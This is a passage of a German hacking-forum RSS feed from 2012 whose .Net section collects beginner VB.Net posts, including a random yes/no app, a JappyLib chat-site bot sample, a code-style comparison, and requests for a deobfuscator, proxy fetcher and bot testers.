Aufwand: 2 Minuten<br />
Source:<br />
<div style="margin:20px; margin-top:5px">
<div class="smallfont" style="margin-bottom:2px"><b>Spoiler</b>:<input type="button" value="Show" style="width:45px;font-size:10px;margin:0px;padding:0px;" onClick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = '';        this.innerText = ''; this.value = 'Hide'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Show'; }">
</div>
<div class="alt2" style="margin: 0px; padding: 6px; border: 1px inset;">
<div style="display: none;">
<div class="bbcode_container">
	<div class="bbcode_description">PHP-Code:</div>
	<hr /><code class="bbcode_code"><code><span style="color: #000000">
<span style="color: #0000BB"><br /></span><span style="color: #007700">Public&nbsp;Class&nbsp;</span><span style="color: #0000BB">Form1<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #007700">Private&nbsp;</span><span style="color: #0000BB">Sub&nbsp;Button1_Click</span><span style="color: #007700">(</span><span style="color: #0000BB">ByVal&nbsp;sender&nbsp;</span><span style="color: #007700">As&nbsp;</span><span style="color: #0000BB">System</span><span style="color: #007700">.</span><span style="color: #0000BB">Object</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">ByVal&nbsp;e&nbsp;</span><span style="color: #007700">As&nbsp;</span><span style="color: #0000BB">System</span><span style="color: #007700">.</span><span style="color: #0000BB">EventArgs</span><span style="color: #007700">)&nbsp;</span><span style="color: #0000BB">Handles&nbsp;Button1</span><span style="color: #007700">.</span><span style="color: #0000BB">Click<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Dim&nbsp;rndv&nbsp;</span><span style="color: #007700">As&nbsp;</span><span style="color: #0000BB">Integer<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Dim&nbsp;upperbound&nbsp;</span><span style="color: #007700">As&nbsp;</span><span style="color: #0000BB">Integer<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Dim&nbsp;lowerbound&nbsp;</span><span style="color: #007700">As&nbsp;</span><span style="color: #0000BB">Integer<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #007700">If&nbsp;</span><span style="color: #0000BB">TextBox1</span><span style="color: #007700">.</span><span style="color: #0000BB">Text</span><span style="color: #007700">.</span><span style="color: #0000BB">Contains</span><span style="color: #007700">(</span><span style="color: #DD0000">"?"</span><span style="color: #007700">)&nbsp;</span><span style="color: #0000BB">Then<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;upperbound&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"1"<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">lowerbound&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"0"<br /><br /><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">rndv&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">CInt</span><span style="color: #007700">(</span><span style="color: #0000BB">Int</span><span style="color: #007700">((</span><span style="color: #0000BB">upperbound&nbsp;</span><span style="color: #007700">-&nbsp;</span><span style="color: #0000BB">lowerbound&nbsp;</span><span style="color: #007700">+&nbsp;</span><span style="color: #0000BB">1</span><span style="color: #007700">)&nbsp;*&nbsp;</span><span style="color: #0000BB">Rnd</span><span style="color: #007700">()&nbsp;+&nbsp;</span><span style="color: #0000BB">lowerbound</span><span style="color: #007700">))<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;If&nbsp;</span><span style="color: #0000BB">rndv&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"1"&nbsp;</span><span style="color: #0000BB">Then<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;MsgBox</span><span style="color: #007700">(</span><span style="color: #DD0000">"Ja"</span><span style="color: #007700">)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Else<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">MsgBox</span><span style="color: #007700">(</span><span style="color: #DD0000">"Nein"</span><span style="color: #007700">)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">End&nbsp;</span><span style="color: #007700">If<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Else<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">MsgBox</span><span style="color: #007700">(</span><span style="color: #DD0000">"Das&nbsp;ist&nbsp;keine&nbsp;Frage"</span><span style="color: #007700">)<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">End&nbsp;</span><span style="color: #007700">If<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;If&nbsp;</span><span style="color: #0000BB">TextBox1</span><span style="color: #007700">.</span><span style="color: #0000BB">Text&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">""&nbsp;</span><span style="color: #0000BB">Then<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;MsgBox</span><span style="color: #007700">(</span><span style="color: #DD0000">"Gib&nbsp;eine&nbsp;Frage&nbsp;ein"</span><span style="color: #007700">)<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">End&nbsp;</span><span style="color: #007700">If<br /><br /><br /><br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">End&nbsp;Sub<br /><br />End&nbsp;</span><span style="color: #007700">Class&nbsp;<br /></span><span style="color: #0000BB"></span>
</span>
</code></code><hr />
</div>
</div>
</div>
</div><br />
<br />
Programm zum downloaden:<br />
<a href="http://www.file-upload.net/download-4236262/Frag-die-magische-Miesmuschel.exe.html" target="_blank" rel="nofollow">Gibts hier </a><br />
Viel Spaßhihio</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>rVs14</dc:creator>
			<guid isPermaLink="true">net-94/source-frag-magische-miesmuschel-10166</guid>
		</item>
		<item>
			<title>VB.Net Seitenquelltext in in Textdatei speichern</title>
			<link>net-94/seitenquelltext-in-in-textdatei-speichern-10161?goto=newpost</link>
			<pubDate>Tue, 03 Apr 2012 09:12:12 GMT</pubDate>
			<description>Hey, 
Ich möchte den Quelltext einer Seite welche ich mit dem Webbrowser aufrufe in eine Textdatei speichern. 
Wie mache ich das? 
Mein Code bisher:...</description>
			<content:encoded><![CDATA[<div>Hey,<br />
Ich möchte den Quelltext einer Seite welche ich mit dem Webbrowser aufrufe in eine Textdatei speichern.<br />
Wie mache ich das?<br />
Mein Code bisher:<br />
<div class="bbcode_container">
	<div class="bbcode_description">PHP-Code:</div>
	<hr /><code class="bbcode_code"><code><span style="color: #000000">
<span style="color: #0000BB">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #007700">Private&nbsp;</span><span style="color: #0000BB">Sub&nbsp;Button1_Click</span><span style="color: #007700">(</span><span style="color: #0000BB">ByVal&nbsp;sender&nbsp;</span><span style="color: #007700">As&nbsp;</span><span style="color: #0000BB">System</span><span style="color: #007700">.</span><span style="color: #0000BB">Object</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">ByVal&nbsp;e&nbsp;</span><span style="color: #007700">As&nbsp;</span><span style="color: #0000BB">System</span><span style="color: #007700">.</span><span style="color: #0000BB">EventArgs</span><span style="color: #007700">)&nbsp;</span><span style="color: #0000BB">Handles&nbsp;Button1</span><span style="color: #007700">.</span><span style="color: #0000BB">Click<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Dim&nbsp;qt&nbsp;</span><span style="color: #007700">As&nbsp;</span><span style="color: #0000BB">String<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Dim&nbsp;writer&nbsp;</span><span style="color: #007700">As&nbsp;</span><span style="color: #0000BB">System</span><span style="color: #007700">.</span><span style="color: #0000BB">IO</span><span style="color: #007700">.</span><span style="color: #0000BB">StreamWriter<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;WebBrowser1</span><span style="color: #007700">.</span><span style="color: #0000BB">Navigate</span><span style="color: #007700">(</span><span style="color: #DD0000">"http://google.com"</span><span style="color: #007700">)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">qt&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">WebBrowser1</span><span style="color: #007700">.</span><span style="color: #0000BB">DocumentText<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #007700">For&nbsp;</span><span style="color: #0000BB">i&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">1&nbsp;To&nbsp;10000<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;writer</span><span style="color: #007700">.</span><span style="color: #0000BB">WriteLine</span><span style="color: #007700">(</span><span style="color: #0000BB">qt</span><span style="color: #007700">)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">Next<br />&nbsp;&nbsp;&nbsp;&nbsp;End&nbsp;Sub&nbsp;<br /></span>
</span>
</code></code><hr />
</div>Wird mir nur ein weißes Fenster ausgegeben hihio<br />
Kann mir vielleicht jemand helfen?<br />
<br />
mfg</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>rVs14</dc:creator>
			<guid isPermaLink="true">net-94/seitenquelltext-in-in-textdatei-speichern-10161</guid>
		</item>
		<item>
			<title><![CDATA[[S] Deobfuscator]]></title>
			<link>net-94/s-deobfuscator-10005?goto=newpost</link>
			<pubDate>Sat, 31 Mar 2012 18:36:03 GMT</pubDate>
			<description>Topic. 
Sollte kostenlos sein.</description>
			<content:encoded><![CDATA[<div>Topic.<br />
Sollte kostenlos sein.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>rVs14</dc:creator>
			<guid isPermaLink="true">net-94/s-deobfuscator-10005</guid>
		</item>
		<item>
			<title>VB.Net Replace Hilfe</title>
			<link>net-94/replace-hilfe-9971?goto=newpost</link>
			<pubDate>Sat, 31 Mar 2012 11:08:01 GMT</pubDate>
			<description>Ich brauche mal eure Hilfe. Wie mache ich das, das wenn etwas geschrieben wird (Richtextbox) direkt replaced wird, und nicht erst, wenn was neues...</description>
			<content:encoded><![CDATA[<div>Ich brauche mal eure Hilfe. Wie mache ich das, das wenn etwas geschrieben wird (Richtextbox) direkt replaced wird, und nicht erst, wenn was neues geschrieben wird?<br />
Also ich schreib zum Beispiel ä dann steht da ä aber wenn ich dann was neues schreibe steht da ae (hab ich im Code so stehen).<br />
Ich möchte aber, das das direkt replaced wird.<br />
Wie mach ich das jetzt am besten?</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Manipulate</dc:creator>
			<guid isPermaLink="true">net-94/replace-hilfe-9971</guid>
		</item>
		<item>
			<title>VB.Net Get proxy gesucht</title>
			<link>net-94/get-proxy-gesucht-9945?goto=newpost</link>
			<pubDate>Fri, 30 Mar 2012 17:39:14 GMT</pubDate>
			<description>Hi Leute ich suche einen Get Proxy funktion für einen Knuddelbot. 
 
Prinzip: 
Button Drücken 
Textbox wird mit funktonierenden Proxy gefüllt 
 
Were...</description>
			<content:encoded><![CDATA[<div>Hi Leute ich suche einen Get Proxy funktion für einen Knuddelbot.<br />
<br />
Prinzip:<br />
Button Drücken<br />
Textbox wird mit funktonierenden Proxy gefüllt<br />
<br />
Were echt nett wenn ihr mir da weiter helfen könntet</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Sploxfreak</dc:creator>
			<guid isPermaLink="true">net-94/get-proxy-gesucht-9945</guid>
		</item>
		<item>
			<title>visual basic hilfe gesucht</title>
			<link>net-94/visual-basic-hilfe-gesucht-9822?goto=newpost</link>
			<pubDate>Wed, 28 Mar 2012 11:23:21 GMT</pubDate>
			<description>hallo u-hacks Mitglieder, ich suche für Virsual basic bisschen hilfe da ich da noch ein großer anfänger bin und gern mit Virsual basic viel...</description>
			<content:encoded><![CDATA[<div>hallo u-hacks Mitglieder, ich suche für Virsual basic bisschen hilfe da ich da noch ein großer anfänger bin und gern mit Virsual basic viel programmieren will. <br />
fals einer mir helfen kann und das gratis, wäre es sehr nett. <br />
<br />
ich möchte einfach das programmieren von hacks bots usw. <br />
<br />
sonst habe ich noch eine frage, wie kann ich das menü war immer ganz oben von den programmen ist zu ändern? ich meine damit dort wo man es schließen, minimieren und vergrößern kann.<br />
<br />
<br />
<font size="1">Dies wurde mit dem handy geschrieben, sorry wegen den rechtschreibfehlern.</font><br />
<br />
lg Bazs</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Bazs</dc:creator>
			<guid isPermaLink="true">net-94/visual-basic-hilfe-gesucht-9822</guid>
		</item>
		<item>
			<title><![CDATA[VB.Net [Iphone - Siri] kennt ihr doch alle..]]></title>
			<link>net-94/iphone-siri-kennt-ihr-doch-alle-9709?goto=newpost</link>
			<pubDate>Mon, 26 Mar 2012 13:23:01 GMT</pubDate>
			<description><![CDATA[Hi leute :) 
ich wollte mal fragen kann man so ein programm wie "Siri" auch in .Net Basteln ? 
weil ich finde diese App voll geil und wollte das mal...]]></description>
			<content:encoded><![CDATA[<div>Hi leute :)<br />
ich wollte mal fragen kann man so ein programm wie &quot;Siri&quot; auch in .Net Basteln ?<br />
weil ich finde diese App voll geil und wollte das mal in VB.NET Basteln aber alleine schaffe ich es nicht..<br />
<br />
Also das reicht erstma, ich freue mich auf eure Antworten<br />
<br />
MfG Getsha :D</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>getsha</dc:creator>
			<guid isPermaLink="true">net-94/iphone-siri-kennt-ihr-doch-alle-9709</guid>
		</item>
		<item>
			<title>VB.Net Programmierstil</title>
			<link>net-94/programmierstil-9403?goto=newpost</link>
			<pubDate>Tue, 20 Mar 2012 18:27:06 GMT</pubDate>
			<description>Ich habe nun schon bei einigen Anfängern gesehen, dass sie ziemlich unübersichtlich programmieren. 
 
Es folgen nun 2 Codes, die exakt das selbe...</description>
			<content:encoded><![CDATA[<div>Ich habe nun schon bei einigen Anfängern gesehen, dass sie ziemlich unübersichtlich programmieren.<br />
<br />
Es folgen nun 2 Codes, die exakt das selbe ausführen.<br />
<br />
So sieht es bei den meisten Anfängern aus:<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">Module Module1<br />
&nbsp; &nbsp; Sub Main()<br />
&nbsp; &nbsp; &nbsp; &nbsp; Console.ForegroundColor = ConsoleColor.Red<br />
&nbsp; &nbsp; &nbsp; &nbsp; Console.WriteLine(&quot;Username eingeben:&quot;)<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim username As String = Console.ReadLine<br />
&nbsp; &nbsp; &nbsp; &nbsp; Console.ForegroundColor = ConsoleColor.Green<br />
&nbsp; &nbsp; &nbsp; &nbsp; Console.WriteLine(&quot;Passwort eingeben:&quot;)<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim passwort As String = Console.ReadLine<br />
&nbsp; &nbsp; &nbsp; &nbsp; Console.ForegroundColor = ConsoleColor.Yellow<br />
&nbsp; &nbsp; &nbsp; &nbsp; Console.WriteLine(&quot;Logge &quot; &amp; username &amp; &quot; ein.&quot;)<br />
&nbsp; &nbsp; &nbsp; &nbsp; XXX.Login(username, passwort)<br />
&nbsp; &nbsp; &nbsp; &nbsp; Console.ReadLine()<br />
&nbsp; &nbsp; End Sub<br />
End Module</code><hr />
</div>Hier ist meine Variante, ich finde sie übersichtlicher.<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">Module Module1<br />
<br />
&nbsp; &nbsp; Private username, password As String<br />
<br />
&nbsp; &nbsp; Sub Main()<br />
&nbsp; &nbsp; &nbsp; &nbsp; WriteColored(&quot;Benutzername eingeben:&quot;, ConsoleColor.Red)<br />
&nbsp; &nbsp; &nbsp; &nbsp; username = Console.ReadLine<br />
&nbsp; &nbsp; &nbsp; &nbsp; WriteColored(&quot;Passwort eingeben:&quot;, ConsoleColor.Green)<br />
&nbsp; &nbsp; &nbsp; &nbsp; password = Console.ReadLine<br />
&nbsp; &nbsp; &nbsp; &nbsp; WriteColored(&quot;Logge &quot; &amp; username &amp; &quot; ein.&quot;, ConsoleColor.Yellow)<br />
&nbsp; &nbsp; &nbsp; &nbsp; XXX.login(_username, _password)<br />
&nbsp; &nbsp; End Sub<br />
<br />
&nbsp; &nbsp; Private Sub WriteColored(ByVal Text As String, ByVal Farbe As ConsoleColor)<br />
&nbsp; &nbsp; &nbsp; &nbsp; Console.ForegroundColor = Farbe<br />
&nbsp; &nbsp; &nbsp; &nbsp; Console.WriteLine(Text)<br />
&nbsp; &nbsp; &nbsp; &nbsp; Console.ForegroundColor = ConsoleColor.White<br />
&nbsp; &nbsp; End Sub<br />
<br />
End Module</code><hr />
</div><br />
Ihr müsst es nicht so machen, aber das ist meine Art und Weise einen Code etwas übersichtlicher zu gestalten.<br />
Eventuell auch die nachfolgenden Posts lesen :)<br />
<br />
LG</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Snees</dc:creator>
			<guid isPermaLink="true">net-94/programmierstil-9403</guid>
		</item>
		<item>
			<title><![CDATA[VB.Net [Sample] JappyLib]]></title>
			<link>net-94/sample-jappylib-9396?goto=newpost</link>
			<pubDate>Tue, 20 Mar 2012 15:54:53 GMT</pubDate>
			<description>Hallo, ich habe mir eben mal die Jappy-Lib angesehen und nun folgt hier von mir ein kleines Sample wie man sich einloggen kann, seine Profildaten...</description>
			<content:encoded><![CDATA[<div>Hallo, ich habe mir eben mal die Jappy-Lib angesehen und nun folgt hier von mir ein kleines Sample wie man sich einloggen kann, seine Profildaten abrufen kann und einen Gästebucheintrag machen kann.<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">Imports JappyLibV1u2<br />
<br />
Module Module1<br />
<br />
&nbsp; &nbsp; Private client As New JappyLibV1u2.Jappy<br />
&nbsp; &nbsp; Private AnzahlNachrichten As Integer = 0<br />
<br />
&nbsp; &nbsp; Sub Main()<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; Console.Title = &quot;Jappy Bot Sample by Tr0pe7 @ http://u-hacks.net&quot;<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; Login(&quot;USERNAME&quot;, &quot;PASSWORD&quot;)<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; Console.ReadKey()<br />
<br />
&nbsp; &nbsp; End Sub<br />
<br />
&nbsp; &nbsp; Private Sub Login(ByVal username As String, ByVal password As String)<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; If client.Login(username, password) Then<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; CWrite(&quot;[+] Erfolgreich als &quot; &amp; username &amp; &quot; eingeloggt.&quot; &amp; vbNewLine, ConsoleColor.Yellow)<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; GoOn()<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; Else<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; CWrite(&quot;[-] Login als &quot; &amp; username &amp; &quot; fehlgeschlagen.&quot; &amp; vbNewLine, ConsoleColor.Red)<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; End If<br />
<br />
&nbsp; &nbsp; End Sub<br />
<br />
&nbsp; &nbsp; Private Sub GoOn()<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; client.LoadGeneralInfo()<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; CWrite(&quot; --&gt; Credits: &quot; &amp; client.MyNick.MyCredits, ConsoleColor.Yellow)<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; CWrite(&quot; --&gt; Rang: &quot; &amp; client.MyNick.MyRank, ConsoleColor.Yellow)<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; CWrite(&quot; --&gt; Fans: &quot; &amp; client.MyNick.MyFans, ConsoleColor.Yellow)<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; CWrite(&quot; --&gt; Gäastebucheinträge: &quot; &amp; client.MyNick.MyGbEntries, ConsoleColor.Yellow)<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim Freunde As String() = client.MyNick.MyFriends<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim Anzahl_Freunde As Integer = 0<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; For Each Freund In Freunde<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Anzahl_Freunde += 1<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; Next<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; CWrite(&quot; --&gt; Freunde: &quot; &amp; Anzahl_Freunde, ConsoleColor.Yellow)<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim Freunde_Online As String() = client.MyNick.MyFriendsOnline<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim Anzahl_Freunde_Online As Integer = 0<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; For Each Freund In Freunde<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Anzahl_Freunde_Online += 1<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; Next<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; CWrite(&quot; --&gt; Freunde Online: &quot; &amp; Anzahl_Freunde_Online, ConsoleColor.Yellow)<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; CWrite(&quot; --&gt; ErsteBenutzerID: &quot; &amp; client.MyNick.MyFirstUserId, ConsoleColor.Yellow)<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; CWrite(&quot; --&gt; Besucher: &quot; &amp; client.MyNick.MyVisiter, ConsoleColor.Yellow)<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; CWrite(&quot; --&gt; Wohnort: &quot; &amp; client.MyNick.MyLocation, ConsoleColor.Yellow)<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; CWrite(&quot; --&gt; Onlinestatus: &quot; &amp; client.MyNick.MyOnlineState, ConsoleColor.Yellow)<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; 'GB-Eintrag machen an Nick Snees mit dem Text Hallo<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; 'client.Funcs.WriteGbEntry(&quot;Snees&quot;, &quot;Hallo&quot;)<br />
<br />
&nbsp; &nbsp; End Sub<br />
<br />
&nbsp; &nbsp; Private Sub CWrite(ByVal text As String, ByVal color As ConsoleColor)<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; Console.ForegroundColor = color<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; Console.WriteLine(text)<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; Console.ForegroundColor = ConsoleColor.White<br />
<br />
&nbsp; &nbsp; End Sub<br />
<br />
End Module</code><hr />
</div></div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Snees</dc:creator>
			<guid isPermaLink="true">net-94/sample-jappylib-9396</guid>
		</item>
		<item>
			<title><![CDATA[[VB.NET] Consolen Anwendung U-Hacks Logo]]></title>
			<link>net-94/vb-net-consolen-anwendung-u-hacks-logo-9391?goto=newpost</link>
			<pubDate>Tue, 20 Mar 2012 15:05:45 GMT</pubDate>
			<description>Hallo ich dem thread suche ich u-hacks logos für eine consolen anwendung in visual basic. Ich habe auch schon einen source als besipil damit ihr wist...</description>
			<content:encoded><![CDATA[<div>Hallo ich dem thread suche ich u-hacks logos für eine consolen anwendung in visual basic. Ich habe auch schon einen source als besipil damit ihr wist was ich meine :)<br />
<br />
<br />
<br />
suche sowas hier:<br />
<br />
<div style="margin:20px; margin-top:5px">
<div class="smallfont" style="margin-bottom:2px"><b>Spoiler</b>:<input type="button" value="Show" style="width:45px;font-size:10px;margin:0px;padding:0px;" onClick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = '';        this.innerText = ''; this.value = 'Hide'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Show'; }">
</div>
<div class="alt2" style="margin: 0px; padding: 6px; border: 1px inset;">
<div style="display: none;">
 Console.ForegroundColor = ConsoleColor.Magenta<br />
        Console.Write(&quot;###################################  ##################   ###########################&quot;)<br />
        Console.Write(&quot;#                                                                              #&quot;)<br />
        Console.Write(&quot;#                                                                              #&quot;)<br />
        Console.Write(&quot;#                                                                              #&quot;)<br />
        Console.Write(&quot;#        #       #           #    #  #######   ######  #    #                  #&quot;)<br />
        Console.Write(&quot;#        #       #           #    #  #     #  #        #   #                   #&quot;)<br />
        Console.Write(&quot;#        #       #  #######  ######  #######  #        # #                     #&quot;)<br />
        Console.Write(&quot;#         #     #            #    #  #     #  #        #   #                   #&quot;)<br />
        Console.Write(&quot;#          #####             #    #  #     #   ######  #    #                  #&quot;)<br />
        Console.Write(&quot;#                                                                              #&quot;)<br />
        Console.Write(&quot;#                                                                              #&quot;)<br />
        Console.Write(&quot;#                                                                              #&quot;)<br />
        Console.Write(&quot;###################################  #############################################&quot;)
</div>
</div>
</div><br />
<br />
Will mit dem spoiler irgendwie nicht kalppen also hier: <br />
<a href="http://filebeam.com/f68ca5435ef6f194565e14300bfb0c5c" target="_blank" rel="nofollow">http://filebeam.com/f68ca5435ef6f194565e14300bfb0c5c</a><br />
<br />
zu jedem dl ehört auch ein virus total:<br />
<a href="https://www.virustotal.com/file/b957f82848086ad4318a2d5518861154202157389d540d5239eb4732806c1a9d/analysis/1332256173/" target="_blank" rel="nofollow">https://www.virustotal.com/file/b957...is/1332256173/</a></div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Sploxfreak</dc:creator>
			<guid isPermaLink="true">net-94/vb-net-consolen-anwendung-u-hacks-logo-9391</guid>
		</item>
		<item>
			<title>Bot tester gesucht für jappy und knuddels</title>
			<link>net-94/bot-tester-gesucht-fuer-jappy-knuddels-9331?goto=newpost</link>
			<pubDate>Mon, 19 Mar 2012 19:01:01 GMT</pubDate>
			<description>hallo wie schon im thread gesagt suche ich einen bot tester für jappy und knuddels. Fals der thread im falschen abteil gelandet ist sorry. 
 
Wiso...</description>
			<content:encoded><![CDATA[<div>hallo wie schon im thread gesagt suche ich einen bot tester für jappy und knuddels. Fals der thread im falschen abteil gelandet ist sorry.<br />
<br />
Wiso suche ich einen Bottester: <br />
Ich würde mir gerne ein 2 gutachten einsammel dar es ja von rechner zu rechner unterschiedlich ist ob die bots laufen :) <br />
<br />
<br />
<br />
bei interesse einfach per pm melden  euer sploxfreak :)</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Sploxfreak</dc:creator>
			<guid isPermaLink="true">net-94/bot-tester-gesucht-fuer-jappy-knuddels-9331</guid>
		</item>
		<item>
			<title><![CDATA[VB.Net Eigener Button -> Hintergrund transparent]]></title>
			<link>net-94/eigener-button-hintergrund-transparent-9213?goto=newpost</link>
			<pubDate>Sun, 18 Mar 2012 14:26:03 GMT</pubDate>
			<description>Hallo, 
 
ich bin dabei mir einen eigenen Button zu erstellen. Jetzt klappt soweit auch alles gut, aber ich sehe im Hintergrund noch die Form also...</description>
			<content:encoded><![CDATA[<div>Hallo,<br />
<br />
ich bin dabei mir einen eigenen Button zu erstellen. Jetzt klappt soweit auch alles gut, aber ich sehe im Hintergrund noch die Form also der Hintergrund ist irgendwie noch zu sehen.<br />
<br />
Im Konstruktor setze ich die Hintergrundfarbe auf .Transparent , allerdings wirkt das irgendwie nicht:<br />
<br />
<div class="bbcode_container">
